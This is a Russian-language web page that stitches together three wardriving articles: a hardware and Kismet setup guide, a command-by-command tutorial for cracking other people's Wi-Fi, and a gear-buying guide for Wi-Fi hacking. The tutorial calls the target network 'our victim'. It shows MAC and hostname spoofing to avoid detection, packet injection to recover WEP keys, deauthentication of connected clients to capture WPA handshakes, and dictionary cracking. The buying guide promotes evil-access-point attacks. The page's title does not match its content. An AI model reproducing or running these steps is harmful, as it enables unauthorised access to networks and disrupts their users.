Вардрайвинг wifi на windows

Сбор информации о беспроводных сетях или wardriving (в зависимости от способа передвижения, это может быть и warwalking, и warflying, и, как было продемонстрировано на BlackHat 2008 — warbalooning) занятие очень увлекательное и при этом предоставляющее богатые статистические данные об уровне защищености беспроводных сетей по городу.

Часть 1.Hardware

Wi-Fi адаптер

В случае анализа небольшой территории (дом или квартал) может хватить и мощности встроенной в ноутбук или кпк адаптера и антенны. Но для более серьезного исследования мы б рекомендовали USB или PCMCIA адаптер с разъемом для внешней антенны. При выборе адаптера очень важна модель его чипсета, о чем будет подробнее рассказано в следующем разделе. Приводим ниже некоторые из наиболее популярных адаптеров:

Alfa networks AWUS036H

Примечателен своей мощностью (500mW), разъемом SMA для антенны и отлично поддерживаемым чипсетом, USB

Ubiquiti SRC

Адаптер также высокой мощности (300mW), разъем MMCX для антенны, отлично поддерживаемым чипсетом, PCMCIA

Linksys WUSB54GC

Менее мощный адаптер без разъема для антенны. Основные преимущества — поддерживаемый чипсет и возможность его свободного приобретения в Украине.

Полный список карт, которые подходят для подобного рода исследований вы найдете здесь.

Антенна

Если вы решили пользоваться картой с разъемом для подключения внешней антенны, то вам нужна будет либо направленная, либо всенаправленная антенна. Первые имеют большую дальность, при равных коэффициента усиления, но значительно меньший угол охвата. Направленные антенны лучше использовать для сканирования ограниченной территории, либо оценки безопасности конкретных точек доступа. Второй вид лучше подходит именно для wardriving, для сбора данных на большой территории. Для нормального охвата вполне достаточно всенапраленной антенны с усилением 7-9 dbi. Обратите внимание на разъем подключения антенны, чтоб он соответствовал разъему на адаптере. Как правило, это SMA разъем, он на большинстве карт с внешними антеннами. Иногда встречаются более редкие MMCX или N-type. Производитель не имеет особого значения, главное характеристики самой антенны.

GPS

Для того чтоб при сборе информации сохранялись не только параметры точки доступа, но и её координаты, вам понадобиться gps. Причем это может быть как bluetooth или usb/serial gps, так и обычный gps-навигатор подключенный к компьютеру кабелем либо смартфон с встроенным gps. Главное чтобы это устройство могло передавать данные по протоколу nmea (или в случае отдельных gps навигаторов — проприетарному протоколу garmin).

Часть 2.Software

Как нам кажется, значительно удобнее проводить сбор информации о беспроводных сетях на ОС Linux. Далее описанные действия проводились на Ubuntu linux 8.04, но с небольшими изменениями могут быть повторены и на любом другом Linux’е.

Драйверы

Для wardriving вам понадобиться драйвер который поддерживает так называемый «monitor mode», режим в котором адаптер будет принимать все пакеты, а не только те которые ему предназначены. В некоторых драйверах этот режим предусмотрен производителем, некоторые придется пропатчить и перекомпилировать. Наиболее полная информация о драйверах находиться здесь. Безболезненее всего устанавливаються и работают, по нашему мнению, драйверы для чипсетов Ralink rt2500, Realtek 8187 и Atheros.

Для работы и с gps, необходимо чтобы он был установлен как serial device и был закреплен как, например /dev/ttyS0. После этого запустите программу gpsd (apt-get install gpsd)

gpsd /dev/ttyS0

Если вы используете bluetooth gps добавьте ключ -b

gpsd /dev/ttyS0 -b

Программы

Основные 2 программы для wardriving — это Kismet и Aircrack-ng suite. Рассмотрим вначале первую.

Kismet есть во всех репозитариях, так что достаточно выполнить команду apt-get install kismet (или yum install kismet или emerge kismet, соответственно для Debian(Ubuntu),Fedora и Gentoo систем), а после этого открыть конфигурационный файл /etc/kismet/kismet.conf и изменить в нем строку

source=<драйвер, например rtl8187>,<интерфейс, например wlan0>,<просто обозначения этого источника, например first interface> (без скобок)

gps=true, если на вашей системе запущен gpsd, подключенный к gps адаптеру

Этого будет достаточно чтобы kismet был готов к работе. Осталось только его запустить командой kismet. После этого вы увидите постепенно наполняющийся список точек доступа. Во время этого программа будет записывать всю информацию в файлы нескольких форматов — .csv, со списком и параметрами всех точек, .gps — координаты точек и xml — куда записывается и первое и второе.

Эти файлы дальше будет преобразованы в .kml для просмотра в Google Earth и Google Maps. Преобразовывать можна одним из многочисленным скриптов для этого — Kismet Earth, KisGearth. Также, если у вас собрались несколько файлов .csv/.gps/.xml то их можна обьединить в один программой merge из комплекта Kismet tools suite.

О второй программе aircrack-ng suite мы расскажем в следующей статье о безопасности беспроводных сетей, ведь она меньше предназначена для wardriving и больше для аудита беспроводный сетей.

Часть 3.Защита

Скрыть существование своей сети от случайного wardriver’а довольно сложно. В городских условиях волны точки доступа, отбиваясь от стен, могут попадать в совершенно неожиданные места, поэтому нельзя недооценивать шаг планирования и размещения точки и расположить её чтобы максимально покрыть необходимую территорию и ограничить уход волн в ненужных направлениях. Некоторые точки доступа позволяют регулировать мощность сигнала, что является инструментов для контроля распространения сигнала. При необходимости 100% невидимости беспроводной сети можем лишь рекомендовать пользоваться ethernet’ом или полностью экранировать помещение с точкой доступа (например вот так). И последнее — сокрытие имени точки доступа (ESSID cloaking) никоим образом вашу сеть не спрячет, её можно вычислить по данным которые отсылают ей клиенты, а большинство снифферов делают это автоматически, поэтому лучшей вашей защитой будет высокий уровень шифрования и аутентификации (WPA2-PSK с длинным ключом или WPA2-enterprise с внешним сервером аутентификации) и тогда даже если вашу сеть обнаружат, злоумышленники не смогут в нее проникнут.

Подробнее об атаках на беспроводные сети и возможности их предотвращения читайте в следующей статье о безопасности беспроводных сетей.

Вардрайвинг (англ. Wardriving) — процесс поиска и взлома уязвимых точек доступа беспроводных сетей Wi-Fi человеком либо группой лиц, оснащенных переносным компьютером с Wi-Fi-адаптером. При этом для пространственного поиска и локализации точки используется транспортное средство (отсюда и название — боевое вождение). Подробнее…

Вардрайвинг

Для данных целей имеем:

  • Ноутбук Asus EeePC 1005P c Ubuntu 10.04 (12.04 собственно LTS оно лучше) на борту
  • Wi-Fi точку (наша жертва)
  • Wi-Fi клиента у Wi-Fi точке
  • Руки, желательно две

Готовимся. Ставим пакет aircrack-ng и macchanger

1
sudo apt-get install aircrack-ng macchanger

Начиная с версии Ubuntu 12.04, aircrack-ng не содержится в репозиториях Ubuntu. По этой причине придется либо ставить из deb пакета (скачать можно тут) или собирать самим вот так:

1
2
3
sudo wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
tar -zxvf aircrack-ng-1.1.tar.gz
cd aircrack-ng-1.1

Отредактируем файл common.mak заменив строку:

1
CFLAGS          ?= -g -W -Wall -Werror -O3

Строкой:

1
CFLAGS          ?= -g -W -Wall -O3

Все далее собираем и устанавливаем:

1
2
sudo make
sudo make install

Теория. Точки бывают открытые или закрытые. Открытые собственно нечего ломать, берем и заходим. Единственное что может помешать так это фильтрация по mac адресам. Обойти ее можно так:

Смотрим за точкой и ее клиентами. Если нет клиентов, то ждем их. Запоминаем mac адрес клиента и:

1
2
3
sudo ifconfig wlan0 down
sudo macchanger wlan0 --mac=00:11:22:33:44:55
sudo ifconfig wlan0 up

тут 00:11:22:33:44:55 это mac адрес клиента Wi-Fi точки (нашей жертвы). Ну и все подключаемся к точке.

Далее точка у нас закрытая с шифрованием WEP.

Пояснение. Сначала мы смотрим что за точка, ее mac адрес, канал на котором она работает и ssid

Узнаем свой MAC адрес

Имеем

  • Мой MAC адрес: 1C:4B:D6:B8:23:E5
  • MAC адрес точки доступа: 00:14:D1:4B:06:7E
  • SSID точки доступа: ClonNET
  • Канал точки доступа: 6

Получив всю информацию преступаем. Переводим наш адаптер в режим мониторинга.

1
2
sudo airmon-ng stop wlan0
sudo airmon-ng start wlan0 6

Виртуальный интерфейс mon0 создан. Для надежности сменим MAC адрес нашего интерфейса:

1
2
3
sudo ifconfig mon0 down
sudo macchanger mon0 --mac=00:11:22:33:44:55
sudo ifconfig mon0 up

Так же стоит отметить что Host имя тоже может засветится, по этой причине стоит его тоже менять периодически (данное действие требует перезагрузки):

1
2
3
4
sudo vim /etc/hostname
#Например qwhjvsda
sudo vim /etc/hosts
#Во второй строке тоже самое: qwhjvsda

Ловим пакеты от нашей точки.

1
sudo airodump-ng mon0 -w wep -c 6 --bssid 00:14:d1:4b:06:7e

Тут mon0 — интерфейс созданный airmon-ng, 6 — канал точки доступа, 00:14:d1:4b:06:7e — ее мак адрес. wep — имя файлов с данными. Можно принципе ждать, но лучше ускорится =) В новой консоли делаем следующее:

1
2
3
4
sudo aireplay-ng -1 0 -e ClonNET -a 00:14:D1:4B:06:7E 
   -h 1C:4B:D6:B8:23:E5 mon0
sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF 
   -b 00:14:D1:4B:06:7E -h 1C:4B:D6:B8:23:E5 mon0

Тут ClonNET — ssid точки доступа, 00:14:D1:4B:06:7E — ее MAC адрес, 1C:4B:D6:B8:23:E5 — наш MAC адрес, mon0 — наш интерфейс. Пакеты заметно полились быстрее в первой консоли с airodump-ng. Теперь можно ломать.

1
aircrack-ng -P 1 wep*.cap

Тут wep*.cap — имя файлов что указано было выше. Процесс подумает, посчитает и выдаст нам ключ к сети, если не выдаст то скажет сколько еще пакетов нам с Вами собрать.

Далее точка у нас закрытая с шифрованием WPA.

Пояснение. Сначала мы смотрим что за точка, ее mac адрес, канал на котором она работает, а также клиентов данной точки. Дело в том, что при взламывании WPA handshake (пакет авторизации) получить можно только в процессе авторизации клиента. По этой причине нам нужен клиент который работает с точкой доступа и заставить его переавторизоваться.

Узнаем свой MAC адрес

Имеем

  • Мой MAC адрес: 1C:4B:D6:B8:23:E5
  • MAC адрес точки доступа: 00:14:D1:4B:06:7E
  • Канал точки доступа: 6
  • Клиент точки доступа: 00:25:D3:24:B5:DF

Получив всю информацию преступаем. Переводим наш адаптер в режим мониторинга. Да канал можно не указывать, как это я делал в первый раз.

1
2
sudo airmon-ng stop wlan0
sudo airmon-ng start wlan0

Виртуальный интерфейс mon0 создан. Для надежности сменим MAC адрес нашего интерфейса:

1
2
3
sudo ifconfig mon0 down
sudo macchanger mon0 --mac=00:11:22:33:44:55
sudo ifconfig mon0 up

Так же стоит отметить что Host имя тоже может засветится, по этой причине стоит его тоже менять периодически (данное действие требует перезагрузки):

1
2
3
4
sudo vim /etc/hostname
#Например qwhjvsda
sudo vim /etc/hosts
#Во второй строке тоже самое: qwhjvsda

Ловим пакеты от нашей точки.

1
sudo airodump-ng -c 6 -w cap mon0

Тут немного я упростил. Так как у меня всего одна точка была в зоне видимости, то я писал в файл cap все пакеты с 6 канала со всех точек (в моем случае она одна была). Если точек больше смотри по аналогии с wep шифрованием. В другой консоли делаем следующее:

1
2
sudo aireplay-ng --deauth 5 -a 00:14:d1:4b:06:7e 
   -c 00:25:D3:24:B5:DF mon0

Так мы заставили клиента с MAC адресом 00:25:D3:24:B5:DF переавторизоваться тем самым в первой консоли сверху появится надпись handshake — т.е. мы поймали пакет авторизации. Можно воспользоваться Wireshark’ом и отслеживать пакеты авторизации по протоколу eapol. Ломаем.

1
aircrack-ng -w pass.txt cap-01.cap

А теперь суть. WPA ломать простым перебором плохая идея. На это уйдут годы. По этой причине перебор организуем по словарю. В данном примере словарь pass.txt. Вообще словари Вы можете найти тут.
Перебор по словарю поможет только в случае легкого пароля, иначе сломать практически нереально. Однако при включенной опции WPS на точке доступа взломать ее становится многим проще. Как это сделать я описал тут.

Некоторая неприятность — Hidden SSID. Это когда в airodump-ng вместо SSID точки доступы вы видите <length:?> где вместо ? стоит число (это число длина SSID). В этом случае для определения SSID нам нужно либо дождаться клиента к точке доступа, тогда airodump-ng сам определит ее имя, либо вытолкнуть подключенного клиента к примеру вот так:

1
2
sudo aireplay-ng --deauth 5 -a 00:14:d1:4b:06:7e 
   -c 00:25:D3:24:B5:DF mon0

Тут 00:25:D3:24:B5:DF — MAC клиента, 00:14:d1:4b:06:7e — MAC точки доступа. Собственно все. Благодаря этому инструментарию в принципе можно сломать любую Wi-Fi точку доступа.

Появление ошибки:
mon0 is on channel -1, but the AP uses channel 6 после строки:

1
2
sudo aireplay-ng --deauth 5 -a 00:14:d1:4b:06:7e 
   -c 00:25:D3:24:B5:DF mon0

Для начала надо при создании интерфейса mon0 указать канал:

1
sudo airmon-ng start wlan0 6

Если это не помогло тогда попробуйте еще вот такую команду:

1
sudo iwconfig mon0 channel 6

6 — это для примера, в Вашем случае тот канал на котором работает точка доступа. Если после всех попыток по прежнему появляется данная ошибка, то, как заметил Quantum в комментариях, необходимо патчить драйвера. Статья которую привел Quantum в моем случае не помогла по видимому из-за версии драйверов, по этой причине привожу другую которая сработала: Вот она.

Далее необходимые команды:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
sudo apt-get install build-essential
wget http://wireless.kernel.org/download/compat-wireless-2.6/
   compat-wireless.tar.bz2
 
tar -jxf compat-wireless.tar.bz2
cd compat-wireless*
wget http://patches.aircrack-ng.org/
   mac80211.compat08082009.wl_frag+ack_v1.patch
 
patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch
wget http://patches.aircrack-ng.org/
   channel-negative-one-maxim.patch
 
patch ./net/wireless/chan.c channel-negative-one-maxim.patch
#Иногда нужно подправить следующий участок
gedit scripts/update-initramfs
#*** Найдите подобную строку: KLIB=/lib/modules/2.6.31-wl/build
#*** Исправьте на это: KLIB=/lib/modules/$(uname -r)/build
#Собираем и устанавливаем
make && sudo make install
#Перезагрузка
sudo reboot

После перезагрузки проверяем. Если что то пошло не так то отменить данные действия можно следующей командой:

Также попробуйте более свежую версию драйверов например эти или выберите наиболее актуальные тут.

Собираем тулкит для взлома Wi-Fi: USB-адаптеры, «ананасные» роутеры, антенны и другие инструменты

Вардрайвинг, он же перехват трафика Wi-Fi, всегда начинается с выбора оборудования. Именно этим мы и займемся: в удобном формате вопросов и ответов разберем, какие девайсы существуют в природе, для каких задач они подходят лучше всего и что взять для начала.

Почему вардрайвинг — это круто?

На сайте iPass есть интересная статистика роста числа хотспотов Wi-Fi во всем мире. Только взгляни на нее: с 2013 года прирост почти на 900%. Примерно ту же картину можно наблюдать на сайте WiGLE, который собирает информацию о публичных точках доступа.

То есть Wi-Fi теперь везде и всюду; в более-менее крупных городах диапазон 2,4 ГГц забит по полной. Москва, кстати, недавно заняла второе место в мире по распространению Wi-Fi в общественных местах, что меня, как жителя столицы и любителя Wi-Fi-хакинга, радует невероятно. О том, какую роль играют SSID сетей MosMetro_Free и MT_FREE, я еще как-нибудь расскажу.

В общем, ты уже понял: специалист, который рубит в безопасности всего этого добра, без куска хлеба не останется. 

Какие бывают стандарты Wi-Fi?

Возможно, тебя это удивит, но Wi-Fi может работать не только в частотных диапазонах 2,4 и 5 ГГц. За цифрами 802.11 скрывается целый набор стандартов для общения устройств в беспроводной локальной сети. Несущие частоты бывают самые разные. Вот их список:

  • 900 МГц — 802.11ah;
  • 2,4 ГГц — 802.11b, 802.11g, 802.11n, 802.11ax;
  • 3,6 ГГц — 802.11y;
  • 4,9 ГГц — 802.11j;
  • 5 ГГц — 802.11a, 802.11n, 802.11ac, 802.11ax;
  • 5,9 ГГц — 802.11p;
  • 45 ГГц — 802.11aj;
  • 60 ГГц — 802.11aj, 802.11ay.

Если хочешь еще подтянуть матчасть, то обязательно полистай страницу про IEEE 802.11 в «Википедии», а если этого покажется мало, то переходи к первоисточникам и начинай лопатить сами стандарты.

Работа с радиочастотами законодательно регулируется, верно?

Без лицензии можно работать далеко не на любой частоте. Такие нелицензируемые диапазоны получили название ISM (Industrial, Scientific, Medical). Сетку частот и мощность передатчиков для таких диапазонов регулируют соответствующие органы. Без лицензии можно работать только с учетом местных ограничений.

В России этими вопросами занимается Роскомнадзор, ныне хорошо известный каждому. Но если в интернете Роскомнадзор знаменит благодаря блокировкам, то в области беспроводных сетей он, наоборот, продолжает разрешать и разрешать.

На каких частотах можно работать без ограничений?

Без разрешения Роскомнадзора возможно использование следующих диапазонов радиочастот, беспомеховая работа РЭС в которых не обеспечена: 2400–2483,5 МГц для РЭС с максимальной мощностью передатчика 0,1 Вт (каналы 1–13), 5150–5350 МГц для РЭС с максимальной мощностью передатчика 0,2 Вт и только для применения в закрытых помещениях — каналы 36–64, диапазоны UNII-1 и UNII-2.

Диапазон же 5650–5825 МГц (каналы 132–161) пока по-прежнему открыт для воздушных судов, находящихся в полете на высоте не ниже 3000 м. Как ты понимаешь, в неразрешенных частях спектра может обитать разного рода оборудование. Например, радары или релейки. Так что остается ждать улучшений.

Кроме этого, для диапазонов 5150–5350 МГц и 5650–5850 МГц была удвоена максимально допустимая мощность (до 10 мВт) на 1 МГц.

Какие устройства пригодны для вардрайвинга?

Главный выбор, который тебе предстоит сделать, — это даже не конкретная модель устройства, а его тип. Существуют USB-адаптеры (они же «донглы» и «свистки», а на жаргоне их иногда называют «карточками»), Wi-Fi-роутеры, а также микроконтроллеры с поддержкой Wi-Fi. Ты можешь использовать телефон или планшет, но и тут гораздо лучших результатов можно добиться в связке с внешним адаптером.

Почему многие обходятся USB-адаптером («свистком»)?

Это удобно, привычно и обычно дешевле, чем роутер. Есть немалый выбор хорошо зарекомендовавших себя адаптеров с режимом мониторинга (именно он понадобится тебе для проведения атак). В общем, всем начинающим я бы посоветовал брать «свисток» — он в любом случае еще не раз пригодится.

Нельзя ли ломать Wi-Fi с помощью адаптера, встроенного в ноутбук?

Вынужден тебя огорчить: чипы, которые ставят в ноутбуки, обычно нельзя переключить в режим мониторинга, так что и говорить тут не о чем. И даже если бы это было возможно, дальность приема встроенной антенны в ноутбуке обычно невелика, а внешнюю подключать некуда.

С чего начать выбор адаптера?

Существует великое множество вариантов, но далеко не все из них пригодны для хакинга. Советую для начала заглянуть на WikiDevi и посмотреть список рекомендуемых адаптеров. Также немало информации ты можешь найти на сайте WirelesSHack в разделе Wi-Fi and Wireless. Главное, на что нужно смотреть при выборе, — это поддержка режима мониторинга и возможность подключить внешнюю антенну, потому что без нее о какой-то дальности говорить не приходится. И конечно, лучше всего брать адаптер с хорошо зарекомендовавшим себя чипом.

Какие есть известные производители чипов Wi-Fi?

Основные производители чипов — Qualcomm Atheros, Broadcom, Realtek и MediaTek (в прошлом Ralink). Если сравнивать производителей, то Atheros считается идеальным решением для хакинга. К примеру, компания Ubiquiti использует в основном чипы Atheros для создания устройств профессионального уровня. Большая часть рекордов дальности Wi-Fi была поставлена с использованием оборудования Ubiquiti.

Какой адаптер лучше всего брать?

Каждый волен выбирать, что ему нравится, но новичкам я в последнее время рекомендую исключительно TP-Link WN722N. На то есть целый ряд причин: дешевизна, доступность (можно найти в большинстве компьютерных магазинов), поддержка необходимых режимов, поддержка mac80211 (стандарт де-факто для драйверов адаптеров Wi-Fi). Для WN722N есть исходные коды прошивки и опенсорсные драйверы, что очень пригодится для внесения своих модификаций. Также отмечу стабильность и скромные запросы к питанию (0,5 A на максимуме). Это делает возможным подключение к мобильным устройствам через кабель OTG — в Kali NetHunter эта карта поддерживается. С TP-Link WN722N возможно сканировать спектр, а также проводить некоторые продвинутые атаки на 802.11. В общем, все, что только может понадобиться.

TP-Link WN722N

Уточнение от читателя

После публикации статьи читатель под ником InfiniteSuns прислал дополнение: у адаптеров 722N с недавних пор появилась вторая ревизия железа на кристалле RTL8188EUS.

Таким образом, сказанное про Atheros справедливо только по отношению к 722N ревизии 1.Х. Для наших целей искать следует именно такие адаптеры.

А как же легендарная «Альфа»?

Многие начинающие вардрайверы стараются купить так называемую «Альфу», то есть один из адаптеров Alfa Networks. Но этот производитель выпускает массу устройств на самых разных чипсетах, так что «та самая» Alfa может быть очень разной. Для меня, как и для многих, это Alfa AWUS036H. В свое время это была самая желанная «карточка», так как у нее есть собственный усилитель. Остальные устройства Alfa тоже отлично спроектированы и собраны, но я бы не сказал, что уникальны.

Увы, лучшие дни Alfa AWUS036H уже позади. В ее основе — чипсет Realtek 8187L, которому неведом стандарт 802.11n, как и режим точки доступа. При атаках на WPS со слабым уровнем сигнала Alfa AWUS036H по-прежнему вне конкуренции, но во всех других случаях ничего особенного в ней нет. Да и к мобильному телефону ее, увы, не подключишь — усилитель требует слишком много энергии.

Существуют адаптеры Alfa с маркировкой Long-Range. Усилителя в них нет, но зато туда ставят хорошие фильтры и чип TeraLink, к которому уже есть «правильные» дрова. Так что можешь рассмотреть как вариант.

Alfa AWUS036H

Нужен ли какой-то специальный кабель?

Прежде чем подключать адаптер к компьютеру, следует обеспечить надежное питание, чтобы избежать сбоев. Это важно для всех ВЧ-устройств, а если у тебя Alfa AWUS036H, то стоит помнить про ее повышенное энергопотребление. Не все кабели USB одинаково полезны, и от качества может зависеть сила тока (косвенным показателем качества может быть толщина). Так что, приобретя хорошую «карточку», лучше не подсоединяй ее чем попало.

Нужно ли искать адаптер с USB 3.0, или хватит USB 2.0?

Большинство адаптеров снабжены интерфейсом USB 2.0, потому что USB 3.0 вносит значительные ограничения. Серьезные производители чипов (тот же Atheros) поддерживают диапазон 5 ГГц только на картах с PCI-E — именно их я и рекомендую брать для работы с 5 ГГц. А для остального подойдет и USB 2.0.

Можно ли найти приличный адаптер на AliExpress?

На китайских развалах полно разных адаптеров, в том числе клонов известных марок вроде Alfa. Но, выбирая из них, нужно быть очень осторожным: приведенные характеристики зачастую не соответствуют действительности и даже чип может быть установлен не той модификации, что указан в описании. Как результат — удалось найти неплохую внешнюю антенну в комплекте с далеко не самой выдающейся «карточкой» (речь о Netsys 9000WN), а также несколько экстремально дешевых адаптеров. В общем, если жаждешь приключений и экономии — ищи, и, возможно, попадется что-нибудь интересное. Не забудь поделиться в комментариях своей находкой!

В каких случаях стоит брать роутер, а не USB-адаптер?

При использовании «свистка» программа должна работать на компьютере, а это не всегда удобно. Та же самая атака на WPS может растянуться на восемь часов, и в уличных условиях, да еще и в нашем суровом климате, заниматься вардрайвингом с ноутбуком наперевес — то еще развлечение.

Логично было бы вынести эту работу на отдельное устройство, и роутер — как раз такое самодостаточное устройство. Нужно только подобрать подходящий и снабдить его специальной прошивкой. Обычно хакерские прошивки собирают на основе OpenWrt и добавляют туда необходимый софт: Aircrack-ng, Reaver, PixieWPS и другие утилиты. Готовое же решение пока что всего одно — это всем известный «Ананас», он же WiFi Pineapple.

К тому же есть класс атак, которые невозможно проводить, используя USB-адаптер. Например, есть такая атака Karma, которая потом стала известна как Mana. Это «злая» точка доступа. Если ты попытаешься воспроизвести ее со «свистком» (к примеру, тем же TP-Link WN722N), то столкнешься с ограничением в семь клиентов, которое жестко прописано в прошивке. Настоящая же причина в том, что у адаптера недостаточно внутренней памяти.

Что собой представляет этот «ананасный» роутер?

WiFi Pineapple начинался как проект кастомной прошивки для роутера фирмы Alfa и тогда носил название Jasager. Под руководством команды из Hak5 проект за годы дорос до отдельного и весьма специфичного устройства, которое позволяет не только перехватывать Wi-Fi, но и проводить последующие атаки MiTM в сети. Поставляется он в двух вариантах: в виде отдельного устройства WiFi Pineapple TETRA или же в формате USB WiFi Pineapple NANO.

Pineapple NANO и TETRA

Почему бы тогда не прикупить этот Pineapple?

«Ананас» — это, безусловно, интересное устройство, которое заслуживает отдельной статьи. У него удобный и красивый веб-интерфейс и все готово для потребителя. Но он недешев (NANO стоит 99, TETRA — 199 долларов), и его невозможно заказать из России напрямую.

На какие еще роутеры стоит обратить внимание?

Роутеры бывают на любой вкус и цвет, а о поддержке OpenWrt ты можешь узнать на сайте этого проекта. Из стационарных можно порекомендовать, например, TP-Link TL-WDR4300 на чипе Atheros, он позволяет одновременно работать с диапазонами 2,4 и 5 ГГц. Но на полевые работы его с собой не возьмешь.

Мне в последнее время приглянулись решения гонконгской фирмы GL.iNet на основе SoM Domino Core. GL.iNet предлагает полный спектр решений — от голых плат и компонентов до собранных роутеров. Себе я взял GL-MiFi за 99 долларов. Он отличается следующими достоинствами:

  • есть внутренний аккумулятор (в отличие от «Ананаса»);
  • при заказе можно добавить 4G-модем Quectel EC-25, который хакабелен и сам по себе;
  • возможно подключить внешние антенны через разъемы UFL на плате;
  • можно при желании использовать как аккумулятор для зарядки мобильного телефона;
  • по меркам китайских вендоров GL.iNet крайне адекватен, даже делает свои прошивки для работы через Tor.

Продукцию GL.iNet уже оценило хакерское сообщество, и для нее стали появляться прошивки с самодельным «Ананасом». Похвалюсь и сам: я собрал единый репозиторий с разного рода поделками «Ананаса», который может пригодиться любителям DIY.

GL-MiFi спереди и сзади 

Какие роутеры брать не стоит (или стоит, но с осторожностью)?

Хоть выбор роутеров и велик, но для хакинга сгодится не любой. Мое предпочтение, как и в случае с адаптерами, на стороне железа с чипами Atheros. Это в том числе все та же продукция TP-Link, которая давно и успешно применяется хакерами. Модели TL-WR703N, TL-MR3020, TL-MR3040 еще не так давно повсеместно использовались для создания хакерских прошивок и модов.

Именно на их основе любители собирали свои «пиратские» версии и «Ананаса» с поддержкой атаки Karma. Наличие порта USB позволяет воткнуть как 3G/4G-модем, так и обычную флешку с приличным набором софта, а возможность запустить Python + Scapy придется по нраву многим любителям сетевого веселья.

Однако скромный размер ПЗУ и ОЗУ в этих моделях стал серьезной преградой для создания более интересных прошивок. Так что если ты не готов к моддингу, то покупать их сегодня я бы не рекомендовал.

Можно ли «прокачать» уже купленный роутер?

Малый размер ПЗУ и ОЗУ — это еще не приговор для устройства, их можно выпаять и заменить относительно дешево. Сами чипы стоят копейки. В качестве ROM-чипа возьму на себя смелость порекомендовать Winbond W25Q128FV с 16 Мбайт флеш-памяти.

С RAM все еще забавнее: возможно, тебе вовсе не понадобится ничего покупать. Оперативку можно успешно позаимствовать со старых плашек памяти стандарта DDR1 (ты ведь их сохранил, выкидывая старый системник, верно?). Если же в ящике твоего стола нет коллекции старинных комплектующих, а дедушка свой компьютер разбирать не разрешил, это тоже не беда. Предприимчивые китайцы продают готовые киты для замены — ищи RAM в корпусах TSOP-II на 66 ножек.

Прежде чем расширять память, следует перепрошить роутер. Потому что родные прошивки большинства роутеров частенько содержат захардкоженные адреса, которые не будут соблюдены при большем количестве оперативной памяти.

Если ты уже запорол роутер, то тебя спасет U-Boot. В случае с роутерами TP-Link нужно только шепнуть заветные буквы tpl в UART при загрузке, и девайс выдаст тебе доступ к U-Boot вместо того, чтобы продолжать грузить крашащееся ядро.

Что нужно для взлома Wi-Fi с мобильного телефона?

Когда у тебя нет возможности развернуться с антеннами и ноутбуком, остается запасной вариант — использовать для пентестов мобильный телефон. Если вкратце, то тебе понадобится дистрибутив Kali NetHunter, один из совместимых телефонов с поддерживаемой прошивкой и, конечно, внешний USB-адаптер, подключаемый через кабель OTG.

В качестве донгла можешь взять уже упомянутый TP-Link WN722N — из всех популярных только у него энергопотребление достаточно низкое, чтобы можно было подключать даже к маломощным устройствам. Более дорогие и навороченные «Альфы» тоже вполне реально приспособить к телефону, но не все и не к любому. Мощная «карточка» может не заработать или начать подчистую высасывать аккумулятор телефона. В результате народ уже стал изобретать схемы с внешними батарейками и даже солнечными зарядками.

Kali NetHunter

Пригоден ли для вардрайвинга чип ESP8266?

С модой на IoT распространение получил крохотный беспроводной контроллер ESP8266, а хакеров стала преследовать мысль прорубить на нем мониторинговый режим. И в итоге этого удалось добиться! Но к сожалению, полноценный мониторинг и инъекция пакетов на этом чипе невозможны в силу хардварных ограничений на размер буфера в 128 байт. Такого буфера, конечно же, не хватит на полноценную ловлю хендшейков. Однако его вполне достаточно для отправки deauth-фреймов.. Также хочу обратить твое внимание на проект по Wi-Fi-позиционированию на основе ESP8266.

Какие еще микроконтроллеры можно использовать?

Режим монитора доступен на Ti CC3200 в рамках их фирменной технологии RFSniffer. Надо сказать, что возможность мониторинга на чипах серии Chipcon фирмы Texas Instruments уже привела к появлению таких продуктов, как Yardstick/RFCat и Ubertooth. Они предназначены для хакинга ISM и Bluetooth соответственно.

Что в итоге лучше всего приобрести начинающему?

Если нужно с чего-то начать, то достаточно взять TP-Link WN722N. Это рабочая лошадка, которая в будущем не раз пригодится, — можно цеплять и к ноутбуку, и к планшету, и к роутеру. Есть целый класс атак, которые можно реализовать только с чипом Atheros, — это разного рода кастомные и advanced-атаки.

Роутер же хорош тогда, когда стоит задача запустить сканирование и уйти надолго. Если часто приходится работать в полевых условиях, то можешь, как и я, взять GL-MiFi — он к тому же пригодится не только для хакинга, но и для более мирных целей типа раздачи мобильного интернета.

Какие бывают антенны?

Особым пунктом в списке железа стоит антенна, а точнее антенны. Форма антенны воплощает в себе математические расчеты и поэтому во многих случаях даже патентуется (китайцы, конечно же, в курсе и, как обычно, прибегают к пиратству).

Существует несколько основных видов антенн, и каждый из них хорош для разных задач. По диаграмме направленности их делят:

  • на всенаправленные (штыревые, дипольные);
  • направленные (волновой канал, Uda Yagi);
  • частично направленные (панельные, секторные, тарелки).

Наиболее универсальна, конечно же, штыревая антенна, которая и торчит из большинства домашних роутеров.

Как ты можешь заметить, в антенне есть завитки, и это неспроста. Wi-Fi-сигнал излучается именно в плоскости витков. Поэтому следует быть внимательным при установке Wi-Fi-роутера дома, а точнее ориентации плоскости его антенн так, чтобы не раздавать в сторону соседей сверху и снизу — им это не пригодится.

Какую антенну в итоге брать?

Штыревая, всенаправленная антенна хороша, когда надо работать в режиме точки доступа — раздавать интернет. Когда нас интересует взлом определенной точки доступа, то используются направленные антенны. Две мои основные антенны — штыревая для раздачи интернета и направленная антенна с большим отражателем.

Как закрепить антенну?

Так как направленную антенну нужно жестко фиксировать, то возникает вопрос, с помощью чего это можно сделать. Я рекомендую использовать штатив от фотоаппарата или телескопа. Поскольку штатив у меня всего один, советов по выбору марки и модели я дать не могу. Мой был куплен по принципу «максимум степеней свободы за приемлемые деньги». Ну и конечно, обращай внимание на вес, который может выдержать штатив, и качество его сборки.

Предел мечтаний — это штатив для телескопа, меняющий направление сам при помощи команд через USB или COM-порт. Однако стоят такие малютки недешево. Зато с ними можно говорить о сканировании не только эфира, но и местности. 

С чем еще можно поиграться?

Сейчас и японские внедорожники открываются по Wi-Fi. И то ли еще будет! Сейчас точками доступа снабжается 90% новых автомобилей. Про банальные роутеры, принтеры, камеры и прочий IoT как-то уже и говорить не хочется. Ну а если вдруг потянет на что-нибудь новенькое, то тебя ждут nRF24 и NFC. В общем, скучать не придется!

